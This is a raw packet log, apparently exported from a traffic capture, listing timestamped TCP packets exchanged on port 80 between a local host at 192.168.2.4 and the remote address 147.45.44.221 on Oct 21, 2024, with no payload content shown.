                                                                                                                                                    Oct 21, 2024 08:47:27.106476068 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106496096 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106496096 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106527090 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106535912 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106554985 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106569052 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106585979 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106595993 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106617928 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.106626987 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.106659889 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.111709118 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.111740112 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.111766100 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.111773014 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.111782074 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.111813068 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.111852884 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.111896038 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.111901999 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.111942053 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.111948013 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.111979008 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.111987114 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.112010002 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.112018108 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.112040997 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.112050056 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.112072945 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.112082958 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.112112045 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.198496103 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.198544025 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.198580980 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.198684931 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.198684931 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.198684931 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.223957062 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224006891 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224039078 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224070072 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224118948 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224119902 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224121094 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224121094 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224150896 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224165916 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224168062 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224199057 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224212885 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224226952 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224245071 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224270105 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224281073 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224328995 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224334002 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224360943 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224376917 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224394083 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224406004 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224421024 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224447012 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224464893 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224468946 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224499941 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224517107 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224545956 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224548101 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224581003 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224594116 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224627972 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224631071 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224663019 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224675894 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224694967 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224714041 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224739075 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224742889 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224772930 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224785089 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224814892 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224821091 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224852085 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224874020 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224884987 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224893093 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224915028 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224930048 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224961042 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.224967003 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.224992990 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225012064 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225023985 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225028992 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225064039 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225070953 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225100994 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225117922 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225131989 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225143909 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225177050 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225183010 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225214958 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225224018 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225245953 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225264072 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225285053 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225297928 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225325108 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225346088 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225369930 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225370884 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225404024 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225413084 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225434065 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225450039 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225466013 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225477934 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225497007 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225512028 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225528002 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225543022 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225558996 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225572109 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225590944 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225601912 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225620985 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225639105 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225652933 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225663900 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225683928 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225697994 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225716114 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225729942 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225745916 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225760937 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225776911 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225788116 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225807905 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225822926 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225840092 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225852013 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225871086 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225877047 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225903034 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225917101 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225934029 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225950003 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225966930 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.225986004 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.225996971 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.226011038 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.226030111 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.226042032 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.226062059 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.226074934 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.226105928 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.231137991 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.231149912 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.231189013 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.231205940 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.231220007 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.231232882 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.231245995 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.231246948 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.231261015 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.231275082 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.231281996 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.231306076 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.231307030 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.231319904 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.231324911 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.231333971 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.231352091 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.231358051 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.231372118 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.231415033 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.231415033 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.321614981 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.321693897 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.321799994 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.321832895 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.321863890 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.321890116 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.343439102 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.343489885 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.343509912 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.343539000 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.343569994 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.343602896 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.343650103 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.343669891 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.343669891 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.343669891 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.343669891 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.343682051 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.343687057 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.343724012 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.343748093 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.343787909 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.343800068 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.343852043 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.343866110 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.343913078 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.343935013 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.343962908 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344002008 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344008923 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344054937 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344058037 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344089031 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344111919 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344125032 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344142914 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344180107 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344189882 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344221115 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344233990 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344249010 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344261885 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344289064 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344295979 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344332933 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344343901 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344384909 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344389915 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344423056 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344433069 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344449997 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344464064 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344489098 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344501972 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344543934 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344549894 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344582081 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344594002 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344614029 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344621897 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344644070 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344656944 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344674110 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344685078 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344703913 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344727993 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344736099 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344738007 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344767094 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344774961 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344799042 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344809055 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344830036 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344837904 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344861984 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344871044 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344894886 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344908953 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344924927 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344940901 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344957113 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344964981 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.344988108 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.344995975 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.345021009 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.345029116 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.345052004 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.345066071 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.345083952 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.345091105 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.345113993 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.345124960 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.345145941 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.345159054 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.345175982 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.345192909 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.345208883 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.345221996 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.345242023 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.345252991 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.345274925 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.345284939 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.345305920 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.345318079 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.345339060 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.345346928 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.345374107 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.345380068 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.345416069 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.452250004 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.457288980 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.704931021 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705002069 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:27.705132961 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:27.705162048 CEST8049732147.45.44.221192.168.2.4
